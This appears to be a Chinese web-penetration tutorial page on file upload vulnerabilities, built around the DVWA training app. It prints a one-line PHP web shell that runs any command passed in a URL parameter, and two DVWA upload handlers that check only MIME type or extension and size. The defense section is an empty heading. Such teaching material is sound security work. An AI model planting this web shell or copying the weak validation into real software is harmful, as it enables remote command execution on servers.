<返回更多

Web渗透_文件上传漏洞介绍

2022-07-30    IT知识一享
加入收藏

文件上传漏洞

 

<?php
echo shell_exec($_GET['cmd']);
?> 
#通过cmd去执行命令

 

 

 

 


 

 

 

 

 

 

 

 

 


 

 

File Upload Source
<?php
    if (isset($_POST['Upload'])) {
            $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
            $target_path = $target_path . basename($_FILES['uploaded']['name']);
            $uploaded_name = $_FILES['uploaded']['name'];
            $uploaded_type = $_FILES['uploaded']['type'];
            $uploaded_size = $_FILES['uploaded']['size'];
            if (($uploaded_type == "image/jpeg") && ($uploaded_size < 100000)){
                if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
                
                    echo '
<pre>';
                    echo 'Your image was not uploaded.';
                    echo '</pre>';
                    
                  } else {
                
                    echo '
<pre>';
                    echo $target_path . ' succesfully uploaded!';
                    echo '</pre>';
                    
                    }
            }
            else{
                echo '
<pre>Your image was not uploaded.</pre>';
            }
        }
?>

 

从上面的代码我们能够看出来,他对文件进行了大小和类型的判断;

 

 

 

 

File Upload Source
<?php
if (isset($_POST['Upload'])) {
            $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
            $target_path = $target_path . basename($_FILES['uploaded']['name']);
            $uploaded_name = $_FILES['uploaded']['name'];
            $uploaded_ext = substr($uploaded_name, strrpos($uploaded_name, '.') + 1);
            $uploaded_size = $_FILES['uploaded']['size'];
            if (($uploaded_ext == "jpg" || $uploaded_ext == "JPG" || $uploaded_ext == "jpeg" || $uploaded_ext == "JPEG") && ($uploaded_size < 100000)){
                if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
                    
                    echo '
<pre>';
                    echo 'Your image was not uploaded.';
                    echo '</pre>';
                
                  } else {
                
                    echo '
<pre>';
                    echo $target_path . ' succesfully uploaded!';
                    echo '</pre>';
                    
                    }
            }
            
            else{
                
                echo '
<pre>';
                echo 'Your image was not uploaded.';
                echo '</pre>';
            }
        }
?>

 

 

 


 


 

 

如何进行文件上传漏洞防护?

 

声明:本站部分内容来自互联网,如有版权侵犯或其他问题请与我们联系,我们将立即删除或处理。
▍相关推荐
更多资讯 >>>